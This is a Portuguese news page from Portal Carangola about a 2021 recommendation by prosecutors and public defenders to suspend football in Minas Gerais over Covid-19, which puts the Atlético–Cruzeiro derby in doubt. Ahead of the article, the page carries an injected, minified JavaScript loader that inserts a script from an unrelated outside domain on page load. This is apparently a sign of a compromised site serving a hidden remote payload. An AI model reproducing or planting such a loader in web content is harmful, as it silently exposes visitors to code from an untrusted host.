;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Recomendação de suspensão do futebol põe em xeque clássico entre Galo e Cruzeiro. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Recomendação de suspensão do futebol põe em xeque clássico entre Galo e Cruzeiro.

Rivais mineiros perderam posições — Foto: Ramon Bitencourt

A recomendação emitida nessa quinta-feira dá prazo de 48 horas para a suspensão de todas as partidas de futebol em Minas Gerais.

A recomendação emitida pelo Ministério Público do Trabalho e Defensorias Públicas e MPs de Minas e da União coloca em xeque a realização do clássico entre Atlético e Cruzeiro pelo Campeonato Mineiro 2021. Os órgãos deram 48 horas para que todos os jogos de futebol sejam suspensos em Minas Gerais até “a situação epidemiológica permitir”.

Os signatários da recomendação elencam uma série de considerações que levaram à medida, e afirma que se necessário tomaram as medidas judiciais cabíveis.

No rol de medidas está o aumento da média móvel de mortes diárias por Covid-19 no país; o uso adequado de máscara por pelo menos 80% da população, segundo recomendação da Fiocruz; as possíveis sequelas da doença; a contaminação de mais de 320 atletas e integrantes de comissões técnicas de equipes da Série A do Campeonato Brasileiro em 2020; e o fato que a organização de jogos de futebol coloca em risco a saúde de diversos profissionais (jornalistas, auxiliares de limpeza e de serviços gerais, seguranças e outros envolvidos no funcionamento do jogo, além, é claro, dos atletas), entre outros.

A partida está marcada para domingo, 16 horas, mas a recomendação emitida nessa quinta-feira dá prazo de 48 horas para a suspensão de todas as partidas de futebol em Minas Gerais, o que implicaria no adiamento do clássico entre Atlético e Cruzeiro.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.